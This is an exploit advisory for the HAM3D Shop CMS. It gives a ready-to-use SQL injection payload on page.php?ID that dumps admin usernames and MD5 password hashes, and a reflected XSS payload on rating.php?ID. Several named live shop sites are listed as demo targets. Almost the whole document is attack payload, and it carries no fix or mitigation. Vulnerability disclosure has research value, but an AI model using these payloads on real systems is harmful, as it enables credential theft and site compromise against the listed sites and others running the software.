# Exploit Title: HAM3D Shop CMS Security Hole XSS & SQlinjection parameter rating & Page
# Date: 2/13/2019
# Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin
# Vendor Homepage: HAm3D.net
# Version: Final Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method ( Sql injection ) Nullix Security Team of IRan
[+] Admin Login Page : www.[path].com/admin/login.php
[+] parameter : Page.php?ID=
=================
Mode Hash : MD5
=================
Exploit ==>
page.php?ID=-1'+/*!50000union*/ select /*!50000unhex(hex(grOup_cOncat(username,0x3a,password)))*/+from+auser--+
=================================================================================
Demo:
[+] http://nanokala.ir/page.php?ID=[SQL]
[+] http://www.too30.ir/page.php?ID=[SQL]
=================================================================================
[XSS]
Method ( XSS ) Nullix Security Team of IRan
Method = GET
dir : /rating/
parameter : rating.php?ID=
Exploit : [ "><script>alert(/xss/)</script> ]
For example : ==== > www.[path]/nanokala.ir/rating/rating.php?ID="><script>alert(/xss/)</script>
======================================================================
[+] Demo : nanokala.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
[+] Demo : jamkala.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
[+] Demo : too30.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
======================================================================
[+] TNX to ======> Nullix Team guys
